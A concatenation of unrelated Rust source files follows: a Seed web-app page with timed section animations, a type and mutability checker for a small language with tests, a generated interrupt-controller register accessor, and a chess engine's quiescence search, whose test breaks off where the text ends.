/// per element (1 s apart); `OnTimer` reveals a section and drops its handle.
fn update(msg: Msg, model: &mut Model, orders: &mut impl Orders<Msg>) {
    match msg {
        Msg::StartOver => {
            let mut ms = 1000;
            model.visible.iter_mut().for_each(|(_k, v)| *v = false);
            for key in model.visible.keys() {
                // `key.clone()` already yields an owned String; the old
                // `key.clone().to_string()` allocated a second copy.
                let element = key.clone();
                model.toh[key] = Some(
                    orders.perform_cmd_with_handle(cmds::timeout(ms, || Msg::OnTimer(element))),
                );
                ms += 1000;
            }
        }
        Msg::OnTimer(element) => {
            model.visible[&element] = true;
            model.toh[&element] = None;
        }
    }
}
// ------ ------
// View
// ------ ------
// (Remove the line below once your `Model` become more complex.)
/// Renders the page; each section gets the "animate-in" class once its
/// entry in `model.visible` flips to true (driven by the timers in `update`).
fn view(model: &Model) -> Vec<Node<Msg>> {
    nodes![
        div![
            C!["title", IF!(model.visible["title"] => "animate-in")],
            h1!["Progressive Web Apps"],
        ],
        div![
            C!["content"],
            div![
                C![
                    "course-feature",
                    IF!(model.visible["installable"] => "animate-in")
                ],
                p!["They're installable (without and App Store)!"],
                attrs! { At::Id => "installable"},
            ],
            div![
                C![
                    "course-feature",
                    IF!(model.visible["offline"] => "animate-in")
                ],
                p!["They can work offline!"],
                attrs! { At::Id => "offline"},
            ],
            div![
                C![
                    "course-feature",
                    IF!(model.visible["responsive"] => "animate-in")
                ],
                p!["They look good on any device"],
                attrs! { At::Id => "responsive"},
            ],
            div![
                C!["course-feature", IF!(model.visible["push"] => "animate-in")],
                p!["You can receive Push Messages..."],
                attrs! { At::Id => "push"},
            ],
            div![
                C![
                    "course-feature",
                    IF!(model.visible["notifications"] => "animate-in")
                ],
                p!["...and show Notifications"],
                attrs! { At::Id => "notifications"},
            ],
            div![
                C![
                    "course-feature",
                    IF!(model.visible["native-features"] => "animate-in")
                ],
                p!["PWAs can access native device features like the Camera"],
                attrs! { At::Id => "native-features"},
            ],
            div![
                C!["course-feature", IF!(model.visible["more"] => "animate-in")],
                p!["And so much more!"],
                attrs! { At::Id => "more"},
            ],
        ],
        div![
            // FIX: was `model.visible[4]` — a positional IndexMap lookup that
            // resolved to the "push" entry, while every other section keys by
            // element id; keyed by "button" to match the button it wraps.
            C!["start-over", IF!(model.visible["button"] => "animate-in")],
            button![
                C!["button", IF!(model.visible["button"] => "animate-in")],
                "Start Again!"
            ],
            ev(Ev::Click, |_| Msg::StartOver),
        ]
    ]
}
// ------ ------
// Start
// ------ ------
// (This function is invoked by `init` function in `index.html`.)
#[wasm_bindgen(start)]
pub fn start() {
    // Mounts the Seed app onto the DOM element with id "app".
    App::start("app", init, update, view);
}
|
use ast::abstract_syntax_tree::Ast;
use ast::type_info::TypeInfo;
use std::collections::HashMap;
use ast::s_expression::SExpression;
/// Errors produced while type-checking an AST, including mutability
/// violations (assigning to or redeclaring `const` bindings).
#[derive(Debug, Clone, PartialEq)]
pub enum TypeError {
    // Two types were required to agree but differ; ordering of the pair is
    // determined by the use sites (not all visible here) — confirm there.
    TypeMismatch(TypeInfo, TypeInfo),
    UnsupportedOperation(TypeInfo, TypeInfo),
    LhsNotAnIdentifier,
    IdentifierDoesntExist(String),
    MalformedAST,
    // Mutability
    CanNotAssignToConstVariable,
    CanNotRedeclareConst,
    VariableDoesNotExist, // Remove?
    IsNotAVariable, // Remove?
    CanNotRedeclareFunction,
    CanNotRedeclareStructType
}
use ast::datatype::Datatype;
/// A `TypeInfo` tagged with whether the binding it describes may be
/// reassigned or redeclared.
#[derive(Debug, Clone, PartialEq)]
pub enum Mutability {
    Mutable(TypeInfo),
    Immutable(TypeInfo)
}
impl From<Datatype> for Mutability {
    /// Values converted straight from a `Datatype` default to `Mutable`.
    fn from(datatype: Datatype) -> Mutability {
        Mutability::Mutable(TypeInfo::from(datatype))
    }
}
impl Mutability {
    /// Consumes the wrapper and returns the underlying type info,
    /// discarding the mutability tag.
    fn get_type(self) -> TypeInfo {
        // Or-pattern: both variants carry the same payload.
        match self {
            Mutability::Mutable(ti) | Mutability::Immutable(ti) => ti,
        }
    }

    /// Lifts a plain `TypeResult` into a `MutabilityResult`, defaulting the
    /// success case to `Mutable` (errors pass through unchanged).
    fn from_type_result(type_result: TypeResult) -> MutabilityResult {
        type_result.map(Mutability::Mutable)
    }
}
// Checker results: a bare type, or a type plus its mutability tag.
pub type TypeResult = Result<TypeInfo, TypeError>;
pub type MutabilityResult = Result<Mutability, TypeError>;
// Symbol table mapping a binding name to its mutability-tagged type.
pub type TypeStore = HashMap<String, Mutability>;
impl Ast {
/// Checks for both Type errors as well as mutability conflicts.
pub fn check_types( &self, mut type_store: &mut TypeStore ) -> MutabilityResult {
match *self {
Ast::SExpr(ref sexpr) => {
match *sexpr {
SExpression::Add(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
+ rhs.check_types(type_store)?.get_type()
)
}
SExpression::Subtract(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
- rhs.check_types(type_store)?.get_type()
)
}
SExpression::Multiply(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
* rhs.check_types(type_store)?.get_type()
)
}
SExpression::Divide(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
/ rhs.check_types(type_store)?.get_type()
)
}
SExpression::Modulo(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
% rhs.check_types(type_store)?.get_type()
)
}
SExpression::Equals(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::NotEquals(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::GreaterThan(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::LessThan(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::GreaterThanOrEqual(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::LessThanOrEqual(_, _ ) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::LogicalAnd(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::LogicalOr(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
// TODO, consider moving mutability into this checker? I believe it can be done.
SExpression::VariableDeclaration {
ref identifier,
ref ast,
} => {
let rhs_mutability: Mutability = ast.check_types(type_store)?;
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
// If the variable is found, its mutability needs to be checked
Some(lhs_mutability) => {
match *lhs_mutability {
Mutability::Mutable(ref lhs_type) => {
// Re declaring a variable allows it to change types
}
Mutability::Immutable(_) => {
error = Some(TypeError::CanNotRedeclareConst)
}
}
}
// If the variable doesn't exist yet fall through to not return an error
None => {}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Mutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::ConstDeclaration {
ref identifier,
ref ast,
} => {
let rhs_mutability: Mutability = ast.check_types(type_store)?;
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
// If the variable is found, its mutability needs to be checked
Some(lhs_mutability) => {
error = Some(TypeError::CanNotRedeclareConst)
}
// If the variable doesn't exist yet fall through to not return an error
None => {}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Immutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::DeclareFunction {
ref identifier,
ref function_datatype,
} => {
let rhs_mutability: Mutability = function_datatype.check_types(type_store)?;
// TODO, should I check if the righthand side is a function datatype???
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
// If the variable is found, its mutability needs to be checked
Some(lhs_mutability) => {
error = Some(TypeError::CanNotRedeclareFunction)
}
// If the variable doesn't exist yet fall through to not return an error
None => {}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Immutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::StructDeclaration {
ref identifier,
ref struct_type_info,
} => {
let rhs_mutability: Mutability = struct_type_info.check_types(type_store)?;
// TODO, should I check if the righthand side is a struct type info?
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
// If the variable is found, its mutability needs to be checked
Some(lhs_mutability) => {
error = Some(TypeError::CanNotRedeclareStructType)
}
// If the variable doesn't exist yet fall through to not return an error
None => {}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Immutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::TypeAssignment {
identifier: ref lhs,
type_info: ref rhs,
} |
SExpression::FieldAssignment {
identifier: ref lhs,
ast: ref rhs,
} => {
let rhs_type = rhs.check_types(type_store)?;
if let Ast::ValueIdentifier(ref ident) = ** lhs {
type_store.insert(ident.clone(), rhs_type.clone());
Ok(rhs_type)
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::Assignment {
ref identifier,
ref ast
} => {
let rhs_mutability: Mutability = ast.check_types(type_store)?;
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
Some(lhs_mutability) => {
match *lhs_mutability {
Mutability::Mutable(_) => {
if lhs_mutability.clone().get_type() != rhs_mutability.clone().get_type() {
error = Some(TypeError::TypeMismatch(lhs_mutability.clone().get_type(), rhs_mutability.clone().get_type()))
}
}
Mutability::Immutable(_) => {
error = Some(TypeError::CanNotAssignToConstVariable)
}
}
}
None => {
error = Some(TypeError::IdentifierDoesntExist(ident.clone()))
}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Mutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
return Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::Loop {
ref conditional,
ref body,
} => {
let _ = conditional.check_types(type_store)?; // Possibly return an error on checking the conditional's type.
body.check_types(type_store)
}
SExpression::AccessArray {
ref identifier,
ref index
} => {
if let Ast::ValueIdentifier(ref ident) = **identifier {
match type_store.get(ident) {
Some(lhs_type) => {
if lhs_type.clone().get_type() == TypeInfo::Array(Box::new(TypeInfo::Any)) {
return Ok(lhs_type.clone()) // The lhs will give a specific Array type, ie. Array<Number> vs the "rhs" in this case which is just Array<Any>
} else {
return Err(TypeError::TypeMismatch(lhs_type.clone().get_type(), TypeInfo::Array(Box::new(TypeInfo::Any)) ))
}
}
None => {
return Err(TypeError::IdentifierDoesntExist(ident.clone()))
}
}
} else {
return Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::GetArrayLength(_) => {
Ok(Mutability::Mutable(TypeInfo::Number))
}
SExpression::Range { start: ref _start, end: ref _end} => {
Ok(Mutability::Mutable(TypeInfo::Array(Box::new(TypeInfo::Number))))
}
SExpression::ExecuteFn {
ref identifier,
ref parameters
} => {
let parameter_types: Vec<TypeInfo> = match **parameters {
Ast::ExpressionList(ref expressions) => {
let mut cloned_type_store = type_store.clone();
let mut evaluated_expressions: Vec<TypeInfo> = vec![];
for e in expressions {
match e.check_types(&mut cloned_type_store) {
Ok(dt) => evaluated_expressions.push(dt.get_type()),
Err(err) => return Err(err),
}
}
evaluated_expressions
}
_ => return Err(TypeError::MalformedAST)
};
if let Ast::ValueIdentifier(ref id) = **identifier {
if let Some(ref possible_fn_datatype) = type_store.get(id) {
if let TypeInfo::Function { ref parameters, ref return_type } = (*possible_fn_datatype).clone().get_type() {
let parameter_matches: Vec<TypeResult> = parameter_types
.iter()
.zip( parameters.iter() )
.map( |(input_type, expected_type)| {
if input_type == expected_type {
Ok(input_type.clone())
} else {
return Err(TypeError::TypeMismatch(input_type.clone(), expected_type.clone()))
}
} ).collect();
for e in parameter_matches {
if let Err(type_error) = e {
return Err(type_error)
}
}
return Ok(Mutability::Mutable(*return_type.clone()))
} {
Err(TypeError::MalformedAST)
}
} else {
Err(TypeError::IdentifierDoesntExist(id.clone()))
}
} else {
Err(TypeError::IsNotAVariable)
}
}
SExpression::CreateStruct {
ref identifier,
ref struct_datatype
} => {
if let Ast::ValueIdentifier(ref id) = ** identifier {
if let Some(existing_struct_type) = type_store.get(id){
if let TypeInfo::Struct{ ref map } = existing_struct_type.clone().get_type() {
}
}
}
unimplemented!()
}
SExpression::AccessStructField {
ref identifier,
ref field_identifier
} => {
unimplemented!()
}
SExpression::Print(_) => {
return Ok(Mutability::Mutable(TypeInfo::String))
}
SExpression::Include(_) => {
Ok(Mutability::Mutable(TypeInfo::Any)) // TODO Verify what the include operator returns, consider a No-return type
}
SExpression::Invert(ref parameter) => {
parameter.check_types(type_store)
}
SExpression::Negate(ref parameter) => {
parameter.check_types(type_store)
}
SExpression::Increment(ref parameter) => {
parameter.check_types(type_store)
}
SExpression::Decrement(ref parameter) => {
parameter.check_types(type_store)
}
}
}
Ast::Literal(ref datatype) => {
Ok(Mutability::Mutable(TypeInfo::from( datatype.clone() )))
}
Ast::ValueIdentifier(ref identifier) => {
// if the typestore has the value
if let Some(stored_mutability_and_type) = type_store.get(identifier) {
Ok(stored_mutability_and_type.clone())
} else {
return Ok(Mutability::Mutable(TypeInfo::Any)); // Hasn't been initialized
}
}
Ast::ExpressionList(ref expressions) => {
let mut checked_type: Mutability = Mutability::Mutable(TypeInfo::Any);
for e in expressions {
checked_type = e.check_types(type_store)?;
}
Ok(checked_type)
}
_ => unimplemented!("AST")
}
}
}
#[cfg(test)]
mod test {
    use super::*;
    use parser::program;
    use nom::IResult;

    /// Parses the given source text into an AST, panicking on any parse
    /// failure. (A macro rather than a function so the AST type does not
    /// have to be named here.)
    macro_rules! parse {
        ($src:expr) => {
            match program($src.as_bytes()) {
                IResult::Done(_rest, ast) => ast,
                IResult::Error(e) => panic!("{}", e),
                _ => panic!(),
            }
        };
    }

    #[test]
    fn throw_error_on_type_mismatch_assignment() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
let a := 5
a := "Hello"
"##);
        assert_eq!(
            TypeError::TypeMismatch(TypeInfo::Number, TypeInfo::String),
            ast.check_types(&mut store).unwrap_err() as TypeError
        );
    }

    /// Reassigning the variable will allow its type to change.
    #[test]
    fn different_type_reassignment() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
let a := 5
let a := "Hello"
"##);
        assert_eq!(TypeInfo::String, ast.check_types(&mut store).unwrap().get_type());
    }

    #[test]
    fn throw_error_on_type_mismatch_addition_assignment() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
let a := 5
a := "Hello" + 5
"##);
        assert_eq!(
            TypeError::TypeMismatch(TypeInfo::Number, TypeInfo::String),
            ast.check_types(&mut store).unwrap_err()
        );
    }

    #[test]
    fn throw_error_on_type_mismatch_self_addition_assignment() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
let a := 5
a := "Hello" + a
"##);
        assert_eq!(
            TypeError::TypeMismatch(TypeInfo::Number, TypeInfo::String),
            ast.check_types(&mut store).unwrap_err()
        );
    }

    #[test]
    fn number_is_number() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
40
"##);
        assert_eq!(TypeInfo::Number, ast.check_types(&mut store).unwrap().get_type());
    }

    #[test]
    fn string_is_string() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
"Hello"
"##);
        assert_eq!(TypeInfo::String, ast.check_types(&mut store).unwrap().get_type());
    }

    #[test]
    fn assignment_is_of_type_string() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
let a := "Hello"
a
"##);
        assert_eq!(TypeInfo::String, ast.check_types(&mut store).unwrap().get_type());
    }

    #[test]
    fn number_plus_float_plus_number_is_a_float() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
5 + 10.0 + 2
"##);
        assert_eq!(TypeInfo::Float, ast.check_types(&mut store).unwrap().get_type());
    }

    #[test]
    fn array_is_array() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
let a := [5]
a := [6]
"##);
        assert_eq!(
            TypeInfo::Array(Box::new(TypeInfo::Number)),
            ast.check_types(&mut store).unwrap().get_type()
        );
    }

    #[test]
    fn array_type_mismatch() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
let a := [5]
a := ["Hello"]
"##);
        assert_eq!(
            TypeError::TypeMismatch(
                TypeInfo::Array(Box::new(TypeInfo::Number)),
                TypeInfo::Array(Box::new(TypeInfo::String))
            ),
            ast.check_types(&mut store).unwrap_err()
        );
    }

    #[test]
    fn throw_error_on_unsupported_division() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
"Hello" / 5
"##);
        assert_eq!(
            TypeError::UnsupportedOperation(TypeInfo::String, TypeInfo::Number),
            ast.check_types(&mut store).unwrap_err()
        );
    }

    #[test]
    fn throw_error_on_function_execution() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
fn my_function() -> Number {
5
}
let a := "Hello"
a := my_function()
"##);
        assert_eq!(
            TypeError::TypeMismatch(TypeInfo::String, TypeInfo::Number),
            ast.check_types(&mut store).unwrap_err()
        );
    }

    #[test]
    fn type_check_function_execution() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
fn my_function() -> Number {
5
}
let a := 7
a := my_function()
"##);
        assert_eq!(TypeInfo::Number, ast.check_types(&mut store).unwrap().get_type());
    }

    #[test]
    fn mutability_const_redeclaration_throws_error() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
const a := 5
let a := 4
"##);
        assert_eq!(TypeError::CanNotRedeclareConst, ast.check_types(&mut store).unwrap_err());
    }

    #[test]
    fn mutability_const_reassignment_throws_error() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
const a := 5
a := 4
"##);
        assert_eq!(TypeError::CanNotAssignToConstVariable, ast.check_types(&mut store).unwrap_err());
    }

    #[test]
    fn mutability_function_reassignment_throws_error() {
        let mut store = TypeStore::new();
        let ast = parse!(r##"
fn a() -> Number { 7 }
a := 4
"##);
        assert_eq!(TypeError::CanNotAssignToConstVariable, ast.check_types(&mut store).unwrap_err());
    }
}
pub mod file;
pub mod error;
|
// Auto-generated register accessors (svd2rust-style output, by the looks
// of the `crate::R`/`crate::W` wrappers) -- NOTE(review): edits here are
// normally overwritten when the code is regenerated from the SVD file.
#[doc = "Register `GICD_ICPENDR8` reader"]
pub type R = crate::R<GICD_ICPENDR8_SPEC>;
#[doc = "Register `GICD_ICPENDR8` writer"]
pub type W = crate::W<GICD_ICPENDR8_SPEC>;
#[doc = "Field `ICPENDR8` reader - ICPENDR8"]
pub type ICPENDR8_R = crate::FieldReader<u32>;
#[doc = "Field `ICPENDR8` writer - ICPENDR8"]
pub type ICPENDR8_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 32, O, u32>;
impl R {
    #[doc = "Bits 0:31 - ICPENDR8"]
    #[inline(always)]
    pub fn icpendr8(&self) -> ICPENDR8_R {
        // The field spans the full 32-bit register, so the raw bits are
        // handed to the reader without masking or shifting.
        ICPENDR8_R::new(self.bits)
    }
}
impl W {
    #[doc = "Bits 0:31 - ICPENDR8"]
    #[inline(always)]
    #[must_use]
    pub fn icpendr8(&mut self) -> ICPENDR8_W<GICD_ICPENDR8_SPEC, 0> {
        // Field writer anchored at bit offset 0, covering all 32 bits.
        ICPENDR8_W::new(self)
    }
    #[doc = "Writes raw bits to the register."]
    #[inline(always)]
    pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
        // `unsafe`: the caller is responsible for writing a value that is
        // valid for this register; no checking is performed here.
        self.bits = bits;
        self
    }
}
#[doc = "For interrupts ID\n\nYou can [`read`](crate::generic::Reg::read) this register and get [`gicd_icpendr8::R`](R). You can [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero) this register using [`gicd_icpendr8::W`](W). You can also [`modify`](crate::generic::Reg::modify) this register. See [API](https://docs.rs/svd2rust/#read--modify--write-api)."]
pub struct GICD_ICPENDR8_SPEC;
impl crate::RegisterSpec for GICD_ICPENDR8_SPEC {
    // The register is 32 bits wide.
    type Ux = u32;
}
#[doc = "`read()` method returns [`gicd_icpendr8::R`](R) reader structure"]
impl crate::Readable for GICD_ICPENDR8_SPEC {}
#[doc = "`write(|w| ..)` method takes [`gicd_icpendr8::W`](W) writer structure"]
impl crate::Writable for GICD_ICPENDR8_SPEC {
    // Generator metadata: bitmaps of fields implicitly modified by
    // writing zeros/ones -- both empty for this register.
    const ZERO_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
    const ONE_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
}
#[doc = "`reset()` method sets GICD_ICPENDR8 to value 0"]
impl crate::Resettable for GICD_ICPENDR8_SPEC {
    // Hardware reset value of the register.
    const RESET_VALUE: Self::Ux = 0;
}
|
//! Implements `StdQsearch` and `StdQsearchResult`.
use std::cell::UnsafeCell;
use std::marker::PhantomData;
use uci::{SetOption, OptionDescription};
use board::*;
use value::*;
use depth::*;
use moves::*;
use evaluator::Evaluator;
use qsearch::{Qsearch, QsearchParams, QsearchResult};
use move_generator::MoveGenerator;
use utils::MoveStack;
/// Implements the `QsearchResult` trait.
#[derive(Clone, Debug)]
pub struct StdQsearchResult {
    // The evaluation computed by the search (see `QsearchResult::new`,
    // which asserts it lies in `VALUE_EVAL_MIN..=VALUE_EVAL_MAX`).
    value: Value,
    // How many nodes were visited to compute `value`.
    searched_nodes: u64,
}
impl QsearchResult for StdQsearchResult {
    /// Builds a result, asserting that the value lies within the
    /// legal evaluation range.
    #[inline]
    fn new(value: Value, searched_nodes: u64) -> Self {
        debug_assert!(VALUE_EVAL_MIN <= value && value <= VALUE_EVAL_MAX);
        StdQsearchResult {
            searched_nodes: searched_nodes,
            value: value,
        }
    }

    /// The evaluation computed by the search.
    #[inline]
    fn value(&self) -> Value {
        self.value
    }

    /// The number of nodes visited while computing the evaluation.
    #[inline]
    fn searched_nodes(&self) -> u64 {
        self.searched_nodes
    }
}
/// Implements the `Qsearch` trait.
///
/// Performs classical quiescence search with stand pat, delta
/// pruning, static exchange evaluation, check evasions, limited
/// checks and recaptures.
pub struct StdQsearch<T: MoveGenerator> {
    // Zero-sized marker: `T` is used only through the associated types
    // of the `Qsearch` implementation, never stored.
    phantom: PhantomData<T>,
}
impl<T: MoveGenerator> Qsearch for StdQsearch<T> {
    type MoveGenerator = T;

    type QsearchResult = StdQsearchResult;

    /// Runs a quiescence search described by `params` and returns its
    /// value together with the number of nodes searched.
    fn qsearch(params: QsearchParams<Self::MoveGenerator>) -> Self::QsearchResult {
        debug_assert!(DEPTH_MIN <= params.depth && params.depth <= 0);
        debug_assert!(params.lower_bound >= VALUE_MIN);
        debug_assert!(params.upper_bound <= VALUE_MAX);
        debug_assert!(params.lower_bound < params.upper_bound);
        // One move stack per thread, reused across calls so it is not
        // reallocated for every search.
        thread_local!(
            static MOVE_STACK: UnsafeCell<MoveStack> = UnsafeCell::new(MoveStack::new())
        );
        let mut searched_nodes = 0;
        // SAFETY assumption: exactly one `&mut` to the thread-local stack
        // is created here, and the recursive `qsearch` below keeps reusing
        // that same borrow. NOTE(review): this relies on `qsearch` never
        // re-entering this function on the same thread while the borrow
        // is live -- confirm.
        let value = MOVE_STACK.with(|s| unsafe {
            qsearch(params.position,
                    params.lower_bound,
                    params.upper_bound,
                    params.static_eval,
                    0,
                    -params.depth,
                    &mut *s.get(),
                    &mut searched_nodes)
        });
        StdQsearchResult::new(value, searched_nodes)
    }
}
impl<T: MoveGenerator> SetOption for StdQsearch<T> {
    /// Exposes the move generator's configurable options unchanged.
    fn options() -> Vec<(&'static str, OptionDescription)> {
        T::options()
    }

    /// Forwards an option change to the move generator.
    fn set_option(name: &str, value: &str) {
        T::set_option(name, value)
    }
}
/// A classical recursive quiescence search implementation.
///
/// Parameters:
///
/// * `lower_bound`/`upper_bound` -- the alpha/beta window;
/// * `stand_pat` -- the position's static evaluation, or
///   `VALUE_UNKNOWN` when it has not been computed yet;
/// * `recapture_squares` -- bitboard of squares on which a recapture
///   must be tried regardless of its static exchange evaluation;
/// * `ply` -- the reached `qsearch` depth;
/// * `searched_nodes` -- incremented once for every position visited.
fn qsearch<T: MoveGenerator>(position: &mut T,
                             mut lower_bound: Value, // alpha
                             upper_bound: Value, // beta
                             mut stand_pat: Value, // position's static evaluation
                             mut recapture_squares: Bitboard,
                             ply: i8, // the reached `qsearch` depth
                             move_stack: &mut MoveStack,
                             searched_nodes: &mut u64)
                             -> Value {
    debug_assert!(lower_bound < upper_bound);
    debug_assert!(stand_pat == VALUE_UNKNOWN ||
                  stand_pat == position.evaluator().evaluate(position.board()));
    // Piece values indexed by piece type; presumably
    // [king, queen, rook, bishop, knight, pawn, padding, padding] --
    // NOTE(review): confirm the order matches the piece-index constants.
    const PIECE_VALUES: [Value; 8] = [10000, 975, 500, 325, 325, 100, 0, 0];
    let is_check = position.is_check();

    // At the beginning of quiescence, position's static evaluation
    // (`stand_pat`) is used to establish a lower bound on the
    // result. We assume that even if none of the forcing moves can
    // improve on the stand pat, there will be at least one "quiet"
    // move that will at least preserve the stand pat value. (Note
    // that this assumption is not true if the side to move is in
    // check, because in this case all possible check evasions will be
    // tried.)
    if is_check {
        // Position's static evaluation is useless when in check.
        stand_pat = lower_bound;
    } else if stand_pat == VALUE_UNKNOWN {
        stand_pat = position.evaluator().evaluate(position.board());
    }
    if stand_pat >= upper_bound {
        return stand_pat;
    }
    if stand_pat > lower_bound {
        lower_bound = stand_pat;
    }
    // Delta-pruning margin: presumably, moves whose immediate material
    // gain falls below this cannot realistically raise the score to
    // `lower_bound`, so they are skipped later on.
    let obligatory_material_gain = (lower_bound as isize) - (stand_pat as isize) -
                                   (PIECE_VALUES[KNIGHT] - 4 * PIECE_VALUES[PAWN] / 3) as isize;

    // Generate all forcing moves. (Include checks only during the
    // first ply.)
    move_stack.save();
    position.generate_forcing(ply <= 0, move_stack);

    // Consider the generated moves one by one. See if any of them
    // can raise the lower bound.
    'trymoves: while let Some(m) = move_stack.pull_best() {
        let move_type = m.move_type();
        let dest_square_bb = 1 << m.dest_square();
        let captured_piece = m.captured_piece();

        // Decide whether to try the move. Check evasions,
        // en-passant captures (for them SEE is often wrong), and
        // mandatory recaptures are always tried. (In order to
        // correct SEE errors due to pinned and overloaded pieces,
        // at least one mandatory recapture is always tried at the
        // destination squares of previous moves.) For all other
        // moves, a static exchange evaluation is performed to
        // decide if the move should be tried.
        if !is_check && move_type != MOVE_ENPASSANT && recapture_squares & dest_square_bb == 0 {
            match position.evaluate_move(m) {
                // A losing move -- do not try it.
                x if x < 0 => continue 'trymoves,
                // An even exchange -- try it only during the first few plys.
                0 if ply >= 2 && captured_piece < PIECE_NONE => continue 'trymoves,
                // A safe or winning move -- try it always.
                _ => (),
            }
        }

        // Try the move.
        if position.do_move(m).is_some() {
            // If the move does not give check, ensure that
            // the immediate material gain from the move is
            // big enough.
            if !position.is_check() {
                let material_gain = if move_type == MOVE_PROMOTION {
                    PIECE_VALUES[captured_piece] +
                    PIECE_VALUES[Move::piece_from_aux_data(m.aux_data())] -
                    PIECE_VALUES[PAWN]
                } else {
                    // SAFETY assumption: `captured_piece` is always a
                    // valid index (< 8) by the move encoding --
                    // NOTE(review): confirm.
                    unsafe { *PIECE_VALUES.get_unchecked(captured_piece) }
                };
                if (material_gain as isize) < obligatory_material_gain {
                    position.undo_move(m);
                    continue 'trymoves;
                }
            }

            // Recursively call `qsearch` with a negated, swapped window
            // (negamax convention).
            *searched_nodes += 1;
            let value = -qsearch(position,
                                 -upper_bound,
                                 -lower_bound,
                                 VALUE_UNKNOWN,
                                 recapture_squares ^ dest_square_bb,
                                 ply + 1,
                                 move_stack,
                                 searched_nodes);
            position.undo_move(m);

            // Update the lower bound.
            if value >= upper_bound {
                lower_bound = value;
                break 'trymoves;
            }
            if value > lower_bound {
                lower_bound = value;
            }

            // Mark that a recapture at this square has been tried.
            recapture_squares &= !dest_square_bb;
        }
    }
    move_stack.restore();

    // Return the determined lower bound. (We should make sure
    // that the returned value is between `VALUE_EVAL_MIN` and
    // `VALUE_EVAL_MAX`, regardless of the initial bounds passed
    // to `qsearch`. If we do not take this precautions, the
    // search algorithm will abstain from checkmating the
    // opponent, seeking the huge material gain that `qsearch`
    // promised.)
    match lower_bound {
        x if x < VALUE_EVAL_MIN => VALUE_EVAL_MIN,
        x if x > VALUE_EVAL_MAX => VALUE_EVAL_MAX,
        x => x,
    }
}
#[cfg(test)]
mod tests {
    use board::*;
    use value::*;
    use move_generator::*;
    use stock::{SimpleEvaluator, StdMoveGenerator};
    use utils::MoveStack;

    type P = StdMoveGenerator<SimpleEvaluator>;

    /// Builds a move generator from a FEN string, panicking on
    /// malformed input.
    fn pos(fen: &str) -> P {
        P::from_board(Board::from_fen(fen).ok().unwrap()).ok().unwrap()
    }

    #[test]
    fn qsearch() {
        use super::qsearch;
        let mut s = MoveStack::new();
        // Allowed deviation from the expected score.
        let d = 32;

        let mut p = pos("8/8/8/8/6k1/6P1/8/6K1 b - - 0 1");
        assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0).abs() <= d);

